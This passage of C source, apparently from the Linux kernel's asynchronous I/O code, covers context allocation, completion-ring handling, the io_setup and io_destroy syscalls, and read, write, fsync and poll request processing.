ring->compat_features = AIO_RING_COMPAT_FEATURES;
ring->incompat_features = AIO_RING_INCOMPAT_FEATURES;
ring->header_length = sizeof(struct aio_ring);
flush_dcache_folio(ctx->ring_folios[0]);
return 0;
}
#define AIO_EVENTS_PER_PAGE (PAGE_SIZE / sizeof(struct io_event))
#define AIO_EVENTS_FIRST_PAGE ((PAGE_SIZE - sizeof(struct aio_ring)) / sizeof(struct io_event))
#define AIO_EVENTS_OFFSET (AIO_EVENTS_PER_PAGE - AIO_EVENTS_FIRST_PAGE)
void kiocb_set_cancel_fn(struct kiocb *iocb, kiocb_cancel_fn *cancel)
{
struct aio_kiocb *req;
struct kioctx *ctx;
unsigned long flags;
/*
* kiocb didn't come from aio or is neither a read nor a write, hence
* ignore it.
*/
if (!(iocb->ki_flags & IOCB_AIO_RW))
return;
req = container_of(iocb, struct aio_kiocb, rw);
if (WARN_ON_ONCE(!list_empty(&req->ki_list)))
return;
ctx = req->ki_ctx;
spin_lock_irqsave(&ctx->ctx_lock, flags);
list_add_tail(&req->ki_list, &ctx->active_reqs);
req->ki_cancel = cancel;
spin_unlock_irqrestore(&ctx->ctx_lock, flags);
}
EXPORT_SYMBOL(kiocb_set_cancel_fn);
/*
* free_ioctx() should be RCU delayed to synchronize against the RCU
* protected lookup_ioctx() and also needs process context to call
* aio_free_ring(). Use rcu_work.
*/
static void free_ioctx(struct work_struct *work)
{
struct kioctx *ctx = container_of(to_rcu_work(work), struct kioctx,
free_rwork);
pr_debug("freeing %p\n", ctx);
aio_free_ring(ctx);
free_percpu(ctx->cpu);
percpu_ref_exit(&ctx->reqs);
percpu_ref_exit(&ctx->users);
kmem_cache_free(kioctx_cachep, ctx);
}
static void free_ioctx_reqs(struct percpu_ref *ref)
{
struct kioctx *ctx = container_of(ref, struct kioctx, reqs);
/* At this point we know that there are no any in-flight requests */
if (ctx->rq_wait && atomic_dec_and_test(&ctx->rq_wait->count))
complete(&ctx->rq_wait->comp);
/* Synchronize against RCU protected table->table[] dereferences */
INIT_RCU_WORK(&ctx->free_rwork, free_ioctx);
queue_rcu_work(system_percpu_wq, &ctx->free_rwork);
}
/*
* When this function runs, the kioctx has been removed from the "hash table"
* and ctx->users has dropped to 0, so we know no more kiocbs can be submitted -
* now it's safe to cancel any that need to be.
*/
static void free_ioctx_users(struct percpu_ref *ref)
{
struct kioctx *ctx = container_of(ref, struct kioctx, users);
struct aio_kiocb *req;
spin_lock_irq(&ctx->ctx_lock);
while (!list_empty(&ctx->active_reqs)) {
req = list_first_entry(&ctx->active_reqs,
struct aio_kiocb, ki_list);
req->ki_cancel(&req->rw);
list_del_init(&req->ki_list);
}
spin_unlock_irq(&ctx->ctx_lock);
percpu_ref_kill(&ctx->reqs);
percpu_ref_put(&ctx->reqs);
}
static int ioctx_add_table(struct kioctx *ctx, struct mm_struct *mm)
{
unsigned i, new_nr;
struct kioctx_table *table, *old;
struct aio_ring *ring;
spin_lock(&mm->ioctx_lock);
table = rcu_dereference_raw(mm->ioctx_table);
while (1) {
if (table)
for (i = 0; i < table->nr; i++)
if (!rcu_access_pointer(table->table[i])) {
ctx->id = i;
rcu_assign_pointer(table->table[i], ctx);
spin_unlock(&mm->ioctx_lock);
/* While kioctx setup is in progress,
* we are protected from page migration
* changes ring_folios by ->ring_lock.
*/
ring = folio_address(ctx->ring_folios[0]);
ring->id = ctx->id;
return 0;
}
new_nr = (table ? table->nr : 1) * 4;
spin_unlock(&mm->ioctx_lock);
table = kzalloc(struct_size(table, table, new_nr), GFP_KERNEL);
if (!table)
return -ENOMEM;
table->nr = new_nr;
spin_lock(&mm->ioctx_lock);
old = rcu_dereference_raw(mm->ioctx_table);
if (!old) {
rcu_assign_pointer(mm->ioctx_table, table);
} else if (table->nr > old->nr) {
memcpy(table->table, old->table,
old->nr * sizeof(struct kioctx *));
rcu_assign_pointer(mm->ioctx_table, table);
kfree_rcu(old, rcu);
} else {
kfree(table);
table = old;
}
}
}
static void aio_nr_sub(unsigned nr)
{
spin_lock(&aio_nr_lock);
if (WARN_ON(aio_nr - nr > aio_nr))
aio_nr = 0;
else
aio_nr -= nr;
spin_unlock(&aio_nr_lock);
}
/* ioctx_alloc
* Allocates and initializes an ioctx. Returns an ERR_PTR if it failed.
*/
static struct kioctx *ioctx_alloc(unsigned nr_events)
{
struct mm_struct *mm = current->mm;
struct kioctx *ctx;
int err = -ENOMEM;
/*
* Store the original nr_events -- what userspace passed to io_setup(),
* for counting against the global limit -- before it changes.
*/
unsigned int max_reqs = nr_events;
/*
* We keep track of the number of available ringbuffer slots, to prevent
* overflow (reqs_available), and we also use percpu counters for this.
*
* So since up to half the slots might be on other cpu's percpu counters
* and unavailable, double nr_events so userspace sees what they
* expected: additionally, we move req_batch slots to/from percpu
* counters at a time, so make sure that isn't 0:
*/
nr_events = max(nr_events, num_possible_cpus() * 4);
nr_events *= 2;
/* Prevent overflows */
if (nr_events > (0x10000000U / sizeof(struct io_event))) {
pr_debug("ENOMEM: nr_events too high\n");
return ERR_PTR(-EINVAL);
}
if (!nr_events || (unsigned long)max_reqs > aio_max_nr)
return ERR_PTR(-EAGAIN);
ctx = kmem_cache_zalloc(kioctx_cachep, GFP_KERNEL);
if (!ctx)
return ERR_PTR(-ENOMEM);
ctx->max_reqs = max_reqs;
spin_lock_init(&ctx->ctx_lock);
spin_lock_init(&ctx->completion_lock);
mutex_init(&ctx->ring_lock);
/* Protect against page migration throughout kiotx setup by keeping
* the ring_lock mutex held until setup is complete. */
mutex_lock(&ctx->ring_lock);
init_waitqueue_head(&ctx->wait);
INIT_LIST_HEAD(&ctx->active_reqs);
if (percpu_ref_init(&ctx->users, free_ioctx_users, 0, GFP_KERNEL))
goto err;
if (percpu_ref_init(&ctx->reqs, free_ioctx_reqs, 0, GFP_KERNEL))
goto err;
ctx->cpu = alloc_percpu(struct kioctx_cpu);
if (!ctx->cpu)
goto err;
err = aio_setup_ring(ctx, nr_events);
if (err < 0)
goto err;
atomic_set(&ctx->reqs_available, ctx->nr_events - 1);
ctx->req_batch = (ctx->nr_events - 1) / (num_possible_cpus() * 4);
if (ctx->req_batch < 1)
ctx->req_batch = 1;
/* limit the number of system wide aios */
spin_lock(&aio_nr_lock);
if (aio_nr + ctx->max_reqs > aio_max_nr ||
aio_nr + ctx->max_reqs < aio_nr) {
spin_unlock(&aio_nr_lock);
err = -EAGAIN;
goto err_ctx;
}
aio_nr += ctx->max_reqs;
spin_unlock(&aio_nr_lock);
percpu_ref_get(&ctx->users); /* io_setup() will drop this ref */
percpu_ref_get(&ctx->reqs); /* free_ioctx_users() will drop this */
err = ioctx_add_table(ctx, mm);
if (err)
goto err_cleanup;
/* Release the ring_lock mutex now that all setup is complete. */
mutex_unlock(&ctx->ring_lock);
pr_debug("allocated ioctx %p[%ld]: mm=%p mask=0x%x\n",
ctx, ctx->user_id, mm, ctx->nr_events);
return ctx;
err_cleanup:
aio_nr_sub(ctx->max_reqs);
err_ctx:
atomic_set(&ctx->dead, 1);
if (ctx->mmap_size)
vm_munmap(ctx->mmap_base, ctx->mmap_size);
aio_free_ring(ctx);
err:
mutex_unlock(&ctx->ring_lock);
free_percpu(ctx->cpu);
percpu_ref_exit(&ctx->reqs);
percpu_ref_exit(&ctx->users);
kmem_cache_free(kioctx_cachep, ctx);
pr_debug("error allocating ioctx %d\n", err);
return ERR_PTR(err);
}
/* kill_ioctx
* Cancels all outstanding aio requests on an aio context. Used
* when the processes owning a context have all exited to encourage
* the rapid destruction of the kioctx.
*/
static int kill_ioctx(struct mm_struct *mm, struct kioctx *ctx,
struct ctx_rq_wait *wait)
{
struct kioctx_table *table;
spin_lock(&mm->ioctx_lock);
if (atomic_xchg(&ctx->dead, 1)) {
spin_unlock(&mm->ioctx_lock);
return -EINVAL;
}
table = rcu_dereference_raw(mm->ioctx_table);
WARN_ON(ctx != rcu_access_pointer(table->table[ctx->id]));
RCU_INIT_POINTER(table->table[ctx->id], NULL);
spin_unlock(&mm->ioctx_lock);
/* free_ioctx_reqs() will do the necessary RCU synchronization */
wake_up_all(&ctx->wait);
/*
* It'd be more correct to do this in free_ioctx(), after all
* the outstanding kiocbs have finished - but by then io_destroy
* has already returned, so io_setup() could potentially return
* -EAGAIN with no ioctxs actually in use (as far as userspace
* could tell).
*/
aio_nr_sub(ctx->max_reqs);
if (ctx->mmap_size)
vm_munmap(ctx->mmap_base, ctx->mmap_size);
ctx->rq_wait = wait;
percpu_ref_kill(&ctx->users);
return 0;
}
/*
* exit_aio: called when the last user of mm goes away. At this point, there is
* no way for any new requests to be submited or any of the io_* syscalls to be
* called on the context.
*
* There may be outstanding kiocbs, but free_ioctx() will explicitly wait on
* them.
*/
void exit_aio(struct mm_struct *mm)
{
struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
struct ctx_rq_wait wait;
int i, skipped;
if (!table)
return;
atomic_set(&wait.count, table->nr);
init_completion(&wait.comp);
skipped = 0;
for (i = 0; i < table->nr; ++i) {
struct kioctx *ctx =
rcu_dereference_protected(table->table[i], true);
if (!ctx) {
skipped++;
continue;
}
/*
* We don't need to bother with munmap() here - exit_mmap(mm)
* is coming and it'll unmap everything. And we simply can't,
* this is not necessarily our ->mm.
* Since kill_ioctx() uses non-zero ->mmap_size as indicator
* that it needs to unmap the area, just set it to 0.
*/
ctx->mmap_size = 0;
kill_ioctx(mm, ctx, &wait);
}
if (!atomic_sub_and_test(skipped, &wait.count)) {
/* Wait until all IO for the context are done. */
wait_for_completion(&wait.comp);
}
RCU_INIT_POINTER(mm->ioctx_table, NULL);
kfree(table);
}
static void put_reqs_available(struct kioctx *ctx, unsigned nr)
{
struct kioctx_cpu *kcpu;
unsigned long flags;
local_irq_save(flags);
kcpu = this_cpu_ptr(ctx->cpu);
kcpu->reqs_available += nr;
while (kcpu->reqs_available >= ctx->req_batch * 2) {
kcpu->reqs_available -= ctx->req_batch;
atomic_add(ctx->req_batch, &ctx->reqs_available);
}
local_irq_restore(flags);
}
static bool __get_reqs_available(struct kioctx *ctx)
{
struct kioctx_cpu *kcpu;
bool ret = false;
unsigned long flags;
local_irq_save(flags);
kcpu = this_cpu_ptr(ctx->cpu);
if (!kcpu->reqs_available) {
int avail = atomic_read(&ctx->reqs_available);
do {
if (avail < ctx->req_batch)
goto out;
} while (!atomic_try_cmpxchg(&ctx->reqs_available,
&avail, avail - ctx->req_batch));
kcpu->reqs_available += ctx->req_batch;
}
ret = true;
kcpu->reqs_available--;
out:
local_irq_restore(flags);
return ret;
}
/* refill_reqs_available
* Updates the reqs_available reference counts used for tracking the
* number of free slots in the completion ring. This can be called
* from aio_complete() (to optimistically update reqs_available) or
* from aio_get_req() (the we're out of events case). It must be
* called holding ctx->completion_lock.
*/
static void refill_reqs_available(struct kioctx *ctx, unsigned head,
unsigned tail)
{
unsigned events_in_ring, completed;
/* Clamp head since userland can write to it. */
head %= ctx->nr_events;
if (head <= tail)
events_in_ring = tail - head;
else
events_in_ring = ctx->nr_events - (head - tail);
completed = ctx->completed_events;
if (events_in_ring < completed)
completed -= events_in_ring;
else
completed = 0;
if (!completed)
return;
ctx->completed_events -= completed;
put_reqs_available(ctx, completed);
}
/* user_refill_reqs_available
* Called to refill reqs_available when aio_get_req() encounters an
* out of space in the completion ring.
*/
static void user_refill_reqs_available(struct kioctx *ctx)
{
spin_lock_irq(&ctx->completion_lock);
if (ctx->completed_events) {
struct aio_ring *ring;
unsigned head;
/* Access of ring->head may race with aio_read_events_ring()
* here, but that's okay since whether we read the old version
* or the new version, and either will be valid. The important
* part is that head cannot pass tail since we prevent
* aio_complete() from updating tail by holding
* ctx->completion_lock. Even if head is invalid, the check
* against ctx->completed_events below will make sure we do the
* safe/right thing.
*/
ring = folio_address(ctx->ring_folios[0]);
head = ring->head;
refill_reqs_available(ctx, head, ctx->tail);
}
spin_unlock_irq(&ctx->completion_lock);
}
static bool get_reqs_available(struct kioctx *ctx)
{
if (__get_reqs_available(ctx))
return true;
user_refill_reqs_available(ctx);
return __get_reqs_available(ctx);
}
/* aio_get_req
* Allocate a slot for an aio request.
* Returns NULL if no requests are free.
*
* The refcount is initialized to 2 - one for the async op completion,
* one for the synchronous code that does this.
*/
static inline struct aio_kiocb *aio_get_req(struct kioctx *ctx)
{
struct aio_kiocb *req;
req = kmem_cache_alloc(kiocb_cachep, GFP_KERNEL);
if (unlikely(!req))
return NULL;
if (unlikely(!get_reqs_available(ctx))) {
kmem_cache_free(kiocb_cachep, req);
return NULL;
}
percpu_ref_get(&ctx->reqs);
req->ki_ctx = ctx;
INIT_LIST_HEAD(&req->ki_list);
refcount_set(&req->ki_refcnt, 2);
req->ki_eventfd = NULL;
return req;
}
static struct kioctx *lookup_ioctx(unsigned long ctx_id)
{
struct aio_ring __user *ring = (void __user *)ctx_id;
struct mm_struct *mm = current->mm;
struct kioctx *ctx, *ret = NULL;
struct kioctx_table *table;
unsigned id;
if (get_user(id, &ring->id))
return NULL;
rcu_read_lock();
table = rcu_dereference(mm->ioctx_table);
if (!table || id >= table->nr)
goto out;
id = array_index_nospec(id, table->nr);
ctx = rcu_dereference(table->table[id]);
if (ctx && ctx->user_id == ctx_id) {
if (percpu_ref_tryget_live(&ctx->users))
ret = ctx;
}
out:
rcu_read_unlock();
return ret;
}
static inline void iocb_destroy(struct aio_kiocb *iocb)
{
if (iocb->ki_eventfd)
eventfd_ctx_put(iocb->ki_eventfd);
if (iocb->ki_filp)
fput(iocb->ki_filp);
percpu_ref_put(&iocb->ki_ctx->reqs);
kmem_cache_free(kiocb_cachep, iocb);
}
struct aio_waiter {
struct wait_queue_entry w;
size_t min_nr;
};
/* aio_complete
* Called when the io request on the given iocb is complete.
*/
static void aio_complete(struct aio_kiocb *iocb)
{
struct kioctx *ctx = iocb->ki_ctx;
struct aio_ring *ring;
struct io_event *ev_page, *event;
unsigned tail, pos, head, avail;
unsigned long flags;
/*
* Add a completion event to the ring buffer. Must be done holding
* ctx->completion_lock to prevent other code from messing with the tail
* pointer since we might be called from irq context.
*/
spin_lock_irqsave(&ctx->completion_lock, flags);
tail = ctx->tail;
pos = tail + AIO_EVENTS_OFFSET;
if (++tail >= ctx->nr_events)
tail = 0;
ev_page = folio_address(ctx->ring_folios[pos / AIO_EVENTS_PER_PAGE]);
event = ev_page + pos % AIO_EVENTS_PER_PAGE;
*event = iocb->ki_res;
flush_dcache_folio(ctx->ring_folios[pos / AIO_EVENTS_PER_PAGE]);
pr_debug("%p[%u]: %p: %p %Lx %Lx %Lx\n", ctx, tail, iocb,
(void __user *)(unsigned long)iocb->ki_res.obj,
iocb->ki_res.data, iocb->ki_res.res, iocb->ki_res.res2);
/* after flagging the request as done, we
* must never even look at it again
*/
smp_wmb(); /* make event visible before updating tail */
ctx->tail = tail;
ring = folio_address(ctx->ring_folios[0]);
head = ring->head;
ring->tail = tail;
flush_dcache_folio(ctx->ring_folios[0]);
ctx->completed_events++;
if (ctx->completed_events > 1)
refill_reqs_available(ctx, head, tail);
avail = tail > head
? tail - head
: tail + ctx->nr_events - head;
spin_unlock_irqrestore(&ctx->completion_lock, flags);
pr_debug("added to ring %p at [%u]\n", iocb, tail);
/*
* Check if the user asked us to deliver the result through an
* eventfd. The eventfd_signal() function is safe to be called
* from IRQ context.
*/
if (iocb->ki_eventfd)
eventfd_signal(iocb->ki_eventfd);
/*
* We have to order our ring_info tail store above and test
* of the wait list below outside the wait lock. This is
* like in wake_up_bit() where clearing a bit has to be
* ordered with the unlocked test.
*/
smp_mb();
if (waitqueue_active(&ctx->wait)) {
struct aio_waiter *curr, *next;
unsigned long flags;
spin_lock_irqsave(&ctx->wait.lock, flags);
list_for_each_entry_safe(curr, next, &ctx->wait.head, w.entry)
if (avail >= curr->min_nr) {
wake_up_process(curr->w.private);
list_del_init_careful(&curr->w.entry);
}
spin_unlock_irqrestore(&ctx->wait.lock, flags);
}
}
static inline void iocb_put(struct aio_kiocb *iocb)
{
if (refcount_dec_and_test(&iocb->ki_refcnt)) {
aio_complete(iocb);
iocb_destroy(iocb);
}
}
/* aio_read_events_ring
* Pull an event off of the ioctx's event ring. Returns the number of
* events fetched
*/
static long aio_read_events_ring(struct kioctx *ctx,
struct io_event __user *event, long nr)
{
struct aio_ring *ring;
unsigned head, tail, pos;
long ret = 0;
int copy_ret;
/*
* The mutex can block and wake us up and that will cause
* wait_event_interruptible_hrtimeout() to schedule without sleeping
* and repeat. This should be rare enough that it doesn't cause
* peformance issues. See the comment in read_events() for more detail.
*/
sched_annotate_sleep();
mutex_lock(&ctx->ring_lock);
/* Access to ->ring_folios here is protected by ctx->ring_lock. */
ring = folio_address(ctx->ring_folios[0]);
head = ring->head;
tail = ring->tail;
/*
* Ensure that once we've read the current tail pointer, that
* we also see the events that were stored up to the tail.
*/
smp_rmb();
pr_debug("h%u t%u m%u\n", head, tail, ctx->nr_events);
if (head == tail)
goto out;
head %= ctx->nr_events;
tail %= ctx->nr_events;
while (ret < nr) {
long avail;
struct io_event *ev;
struct folio *folio;
avail = (head <= tail ? tail : ctx->nr_events) - head;
if (head == tail)
break;
pos = head + AIO_EVENTS_OFFSET;
folio = ctx->ring_folios[pos / AIO_EVENTS_PER_PAGE];
pos %= AIO_EVENTS_PER_PAGE;
avail = min(avail, nr - ret);
avail = min_t(long, avail, AIO_EVENTS_PER_PAGE - pos);
ev = folio_address(folio);
copy_ret = copy_to_user(event + ret, ev + pos,
sizeof(*ev) * avail);
if (unlikely(copy_ret)) {
ret = -EFAULT;
goto out;
}
ret += avail;
head += avail;
head %= ctx->nr_events;
}
ring = folio_address(ctx->ring_folios[0]);
ring->head = head;
flush_dcache_folio(ctx->ring_folios[0]);
pr_debug("%li h%u t%u\n", ret, head, tail);
out:
mutex_unlock(&ctx->ring_lock);
return ret;
}
static bool aio_read_events(struct kioctx *ctx, long min_nr, long nr,
struct io_event __user *event, long *i)
{
long ret = aio_read_events_ring(ctx, event + *i, nr - *i);
if (ret > 0)
*i += ret;
if (unlikely(atomic_read(&ctx->dead)))
ret = -EINVAL;
if (!*i)
*i = ret;
return ret < 0 || *i >= min_nr;
}
static long read_events(struct kioctx *ctx, long min_nr, long nr,
struct io_event __user *event,
ktime_t until)
{
struct hrtimer_sleeper t;
struct aio_waiter w;
long ret = 0, ret2 = 0;
/*
* Note that aio_read_events() is being called as the conditional - i.e.
* we're calling it after prepare_to_wait() has set task state to
* TASK_INTERRUPTIBLE.
*
* But aio_read_events() can block, and if it blocks it's going to flip
* the task state back to TASK_RUNNING.
*
* This should be ok, provided it doesn't flip the state back to
* TASK_RUNNING and return 0 too much - that causes us to spin. That
* will only happen if the mutex_lock() call blocks, and we then find
* the ringbuffer empty. So in practice we should be ok, but it's
* something to be aware of when touching this code.
*/
aio_read_events(ctx, min_nr, nr, event, &ret);
if (until == 0 || ret < 0 || ret >= min_nr)
return ret;
hrtimer_setup_sleeper_on_stack(&t, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
if (until != KTIME_MAX) {
hrtimer_set_expires_range_ns(&t.timer, until, current->timer_slack_ns);
hrtimer_sleeper_start_expires(&t, HRTIMER_MODE_REL);
}
init_wait(&w.w);
while (1) {
unsigned long nr_got = ret;
w.min_nr = min_nr - ret;
ret2 = prepare_to_wait_event(&ctx->wait, &w.w, TASK_INTERRUPTIBLE);
if (!ret2 && !t.task)
ret2 = -ETIME;
if (aio_read_events(ctx, min_nr, nr, event, &ret) || ret2)
break;
if (nr_got == ret)
schedule();
}
finish_wait(&ctx->wait, &w.w);
hrtimer_cancel(&t.timer);
destroy_hrtimer_on_stack(&t.timer);
return ret;
}
/* sys_io_setup:
* Create an aio_context capable of receiving at least nr_events.
* ctxp must not point to an aio_context that already exists, and
* must be initialized to 0 prior to the call. On successful
* creation of the aio_context, *ctxp is filled in with the resulting
* handle. May fail with -EINVAL if *ctxp is not initialized,
* if the specified nr_events exceeds internal limits. May fail
* with -EAGAIN if the specified nr_events exceeds the user's limit
* of available events. May fail with -ENOMEM if insufficient kernel
* resources are available. May fail with -EFAULT if an invalid
* pointer is passed for ctxp. Will fail with -ENOSYS if not
* implemented.
*/
SYSCALL_DEFINE2(io_setup, unsigned, nr_events, aio_context_t __user *, ctxp)
{
struct kioctx *ioctx = NULL;
unsigned long ctx;
long ret;
ret = get_user(ctx, ctxp);
if (unlikely(ret))
goto out;
ret = -EINVAL;
if (unlikely(ctx || nr_events == 0)) {
pr_debug("EINVAL: ctx %lu nr_events %u\n",
ctx, nr_events);
goto out;
}
ioctx = ioctx_alloc(nr_events);
ret = PTR_ERR(ioctx);
if (!IS_ERR(ioctx)) {
ret = put_user(ioctx->user_id, ctxp);
if (ret)
kill_ioctx(current->mm, ioctx, NULL);
percpu_ref_put(&ioctx->users);
}
out:
return ret;
}
#ifdef CONFIG_COMPAT
COMPAT_SYSCALL_DEFINE2(io_setup, unsigned, nr_events, u32 __user *, ctx32p)
{
struct kioctx *ioctx = NULL;
unsigned long ctx;
long ret;
ret = get_user(ctx, ctx32p);
if (unlikely(ret))
goto out;
ret = -EINVAL;
if (unlikely(ctx || nr_events == 0)) {
pr_debug("EINVAL: ctx %lu nr_events %u\n",
ctx, nr_events);
goto out;
}
ioctx = ioctx_alloc(nr_events);
ret = PTR_ERR(ioctx);
if (!IS_ERR(ioctx)) {
/* truncating is ok because it's a user address */
ret = put_user((u32)ioctx->user_id, ctx32p);
if (ret)
kill_ioctx(current->mm, ioctx, NULL);
percpu_ref_put(&ioctx->users);
}
out:
return ret;
}
#endif
/* sys_io_destroy:
* Destroy the aio_context specified. May cancel any outstanding
* AIOs and block on completion. Will fail with -ENOSYS if not
* implemented. May fail with -EINVAL if the context pointed to
* is invalid.
*/
SYSCALL_DEFINE1(io_destroy, aio_context_t, ctx)
{
struct kioctx *ioctx = lookup_ioctx(ctx);
if (likely(NULL != ioctx)) {
struct ctx_rq_wait wait;
int ret;
init_completion(&wait.comp);
atomic_set(&wait.count, 1);
/* Pass requests_done to kill_ioctx() where it can be set
* in a thread-safe way. If we try to set it here then we have
* a race condition if two io_destroy() called simultaneously.
*/
ret = kill_ioctx(current->mm, ioctx, &wait);
percpu_ref_put(&ioctx->users);
/* Wait until all IO for the context are done. Otherwise kernel
* keep using user-space buffers even if user thinks the context
* is destroyed.
*/
if (!ret)
wait_for_completion(&wait.comp);
return ret;
}
pr_debug("EINVAL: invalid context id\n");
return -EINVAL;
}
static void aio_remove_iocb(struct aio_kiocb *iocb)
{
struct kioctx *ctx = iocb->ki_ctx;
unsigned long flags;
spin_lock_irqsave(&ctx->ctx_lock, flags);
list_del(&iocb->ki_list);
spin_unlock_irqrestore(&ctx->ctx_lock, flags);
}
static void aio_complete_rw(struct kiocb *kiocb, long res)
{
struct aio_kiocb *iocb = container_of(kiocb, struct aio_kiocb, rw);
if (!list_empty_careful(&iocb->ki_list))
aio_remove_iocb(iocb);
if (kiocb->ki_flags & IOCB_WRITE) {
struct inode *inode = file_inode(kiocb->ki_filp);
if (S_ISREG(inode->i_mode))
kiocb_end_write(kiocb);
}
iocb->ki_res.res = res;
iocb->ki_res.res2 = 0;
iocb_put(iocb);
}
static int aio_prep_rw(struct kiocb *req, const struct iocb *iocb, int rw_type)
{
int ret;
req->ki_write_stream = 0;
req->ki_complete = aio_complete_rw;
req->private = NULL;
req->ki_pos = iocb->aio_offset;
req->ki_flags = req->ki_filp->f_iocb_flags | IOCB_AIO_RW;
if (iocb->aio_flags & IOCB_FLAG_RESFD)
req->ki_flags |= IOCB_EVENTFD;
if (iocb->aio_flags & IOCB_FLAG_IOPRIO) {
/*
* If the IOCB_FLAG_IOPRIO flag of aio_flags is set, then
* aio_reqprio is interpreted as an I/O scheduling
* class and priority.
*/
ret = ioprio_check_cap(iocb->aio_reqprio);
if (ret) {
pr_debug("aio ioprio check cap error: %d\n", ret);
return ret;
}
req->ki_ioprio = iocb->aio_reqprio;
} else
req->ki_ioprio = get_current_ioprio();
ret = kiocb_set_rw_flags(req, iocb->aio_rw_flags, rw_type);
if (unlikely(ret))
return ret;
req->ki_flags &= ~IOCB_HIPRI; /* no one is going to poll for this I/O */
return 0;
}
static ssize_t aio_setup_rw(int rw, const struct iocb *iocb,
struct iovec **iovec, bool vectored, bool compat,
struct iov_iter *iter)
{
void __user *buf = (void __user *)(uintptr_t)iocb->aio_buf;
size_t len = iocb->aio_nbytes;
if (!vectored) {
ssize_t ret = import_ubuf(rw, buf, len, iter);
*iovec = NULL;
return ret;
}
return __import_iovec(rw, buf, len, UIO_FASTIOV, iovec, iter, compat);
}
static inline void aio_rw_done(struct kiocb *req, ssize_t ret)
{
switch (ret) {
case -EIOCBQUEUED:
break;
case -ERESTARTSYS:
case -ERESTARTNOINTR:
case -ERESTARTNOHAND:
case -ERESTART_RESTARTBLOCK:
/*
* There's no easy way to restart the syscall since other AIO's
* may be already running. Just fail this IO with EINTR.
*/
ret = -EINTR;
fallthrough;
default:
req->ki_complete(req, ret);
}
}
static int aio_read(struct kiocb *req, const struct iocb *iocb,
bool vectored, bool compat)
{
struct iovec inline_vecs[UIO_FASTIOV], *iovec = inline_vecs;
struct iov_iter iter;
struct file *file;
int ret;
ret = aio_prep_rw(req, iocb, READ);
if (ret)
return ret;
file = req->ki_filp;
if (unlikely(!(file->f_mode & FMODE_READ)))
return -EBADF;
if (unlikely(!file->f_op->read_iter))
return -EINVAL;
ret = aio_setup_rw(ITER_DEST, iocb, &iovec, vectored, compat, &iter);
if (ret < 0)
return ret;
ret = rw_verify_area(READ, file, &req->ki_pos, iov_iter_count(&iter));
if (!ret)
aio_rw_done(req, file->f_op->read_iter(req, &iter));
kfree(iovec);
return ret;
}
static int aio_write(struct kiocb *req, const struct iocb *iocb,
bool vectored, bool compat)
{
struct iovec inline_vecs[UIO_FASTIOV], *iovec = inline_vecs;
struct iov_iter iter;
struct file *file;
int ret;
ret = aio_prep_rw(req, iocb, WRITE);
if (ret)
return ret;
file = req->ki_filp;
if (unlikely(!(file->f_mode & FMODE_WRITE)))
return -EBADF;
if (unlikely(!file->f_op->write_iter))
return -EINVAL;
ret = aio_setup_rw(ITER_SOURCE, iocb, &iovec, vectored, compat, &iter);
if (ret < 0)
return ret;
ret = rw_verify_area(WRITE, file, &req->ki_pos, iov_iter_count(&iter));
if (!ret) {
if (S_ISREG(file_inode(file)->i_mode))
kiocb_start_write(req);
req->ki_flags |= IOCB_WRITE;
aio_rw_done(req, file->f_op->write_iter(req, &iter));
}
kfree(iovec);
return ret;
}
static void aio_fsync_work(struct work_struct *work)
{
struct aio_kiocb *iocb = container_of(work, struct aio_kiocb, fsync.work);
scoped_with_creds(iocb->fsync.creds)
iocb->ki_res.res = vfs_fsync(iocb->fsync.file, iocb->fsync.datasync);
put_cred(iocb->fsync.creds);
iocb_put(iocb);
}
static int aio_fsync(struct fsync_iocb *req, const struct iocb *iocb,
bool datasync)
{
if (unlikely(iocb->aio_buf || iocb->aio_offset || iocb->aio_nbytes ||
iocb->aio_rw_flags))
return -EINVAL;
if (unlikely(!req->file->f_op->fsync))
return -EINVAL;
req->creds = prepare_creds();
if (!req->creds)
return -ENOMEM;
req->datasync = datasync;
INIT_WORK(&req->work, aio_fsync_work);
schedule_work(&req->work);
return 0;
}
static void aio_poll_put_work(struct work_struct *work)
{
struct poll_iocb *req = container_of(work, struct poll_iocb, work);
struct aio_kiocb *iocb = container_of(req, struct aio_kiocb, poll);
iocb_put(iocb);
}
/*
* Safely lock the waitqueue which the request is on, synchronizing with the
* case where the ->poll() provider decides to free its waitqueue early.
*
* Returns true on success, meaning that req->head->lock was locked, req->wait
* is on req->head, and an RCU read lock was taken. Returns false if the
* request was already removed from its waitqueue (which might no longer exist).
*/
static bool poll_iocb_lock_wq(struct poll_iocb *req)
{
wait_queue_head_t *head;
/*
* While we hold the waitqueue lock and the waitqueue is nonempty,
* wake_up_pollfree() will wait for us. However, taking the waitqueue
* lock in the first place can race with the waitqueue being freed.
*
* We solve this as eventpoll does: by taking advantage of the fact that
* all users of wake_up_pollfree() will RCU-delay the actual free. If
* we enter rcu_read_lock() and see that the pointer to the queue is
* non-NULL, we can then lock it without the memory being freed out from
* under us, then check whether the request is still on the queue.
*
* Keep holding rcu_read_lock() as long as we hold the queue lock, in
* case the caller deletes the entry from the queue, leaving it empty.
* In that case, only RCU prevents the queue memory from being freed.
*/
rcu_read_lock();
head = smp_load_acquire(&req->head);
if (head) {
spin_lock(&head->lock);
if (!list_empty(&req->wait.entry))
return true;
spin_unlock(&head->lock);
}
rcu_read_unlock();
return false;
}
static void poll_iocb_unlock_wq(struct poll_iocb *req)
{
spin_unlock(&req->head->lock);
rcu_read_unlock();
}
static void aio_poll_complete_work(struct work_struct *work)
{
struct poll_iocb *req = container_of(work, struct poll_iocb, work);
struct aio_kiocb *iocb = container_of(req, struct aio_kiocb, poll);
struct poll_table_struct pt = { ._key = req->events };
struct kioctx *ctx = iocb->ki_ctx;
__poll_t mask = 0;
if (!READ_ONCE(req->cancelled))
mask = vfs_poll(req->file, &pt) & req->events;
/*
* Note that ->ki_cancel callers also delete iocb from active_reqs after
* calling ->ki_cancel. We need the ctx_lock roundtrip here to
* synchronize with them. In the cancellation case the list_del_init
* itself is not actually needed, but harmless so we keep it in to
* avoid further branches in the fast path.
*/
spin_lock_irq(&ctx->ctx_lock);
if (poll_iocb_lock_wq(req)) {
if (!mask && !READ_ONCE(req->cancelled)) {
/*
* The request isn't actually ready to be completed yet.
* Reschedule completion if another wakeup came in.
*/
if (req->work_need_resched) {
schedule_work(&req->work);
req->work_need_resched = false;
} else {
req->work_scheduled = false;
}
poll_iocb_unlock_wq(req);
spin_unlock_irq(&ctx->ctx_lock);
return;
}
list_del_init(&req->wait.entry);
poll_iocb_unlock_wq(req);
